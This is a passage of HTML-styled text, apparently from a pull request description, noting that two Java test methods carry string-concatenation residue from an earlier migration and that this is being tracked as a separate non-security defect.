var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">testBridgeBackwards2</code>, <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">testInterfaceErrors</code>) whose bodies contain literal Java string-concatenation residue (<code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">" + bridgeName + "</code>) from a prior migration, and whose Java callers in <code style="font-family: var(--app-monospace-font-family); color: var(--vscode-textPreformat-foreground); background-color: var(--vscode-textPreformat-background); padding: 2px 4px; border-radius: 3px; word-break: break-word; font-size: 0.9em;">NotificationManagerImpl</code> pass no arguments. These checks have been silently broken since that migration and represent a pre-existing functional defect, not a security issue. This is being tracked separately.</p><hr style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><h2 style="color: rgb(204, 204, 204); font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(30, 31, 28); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;">Files changed</h2>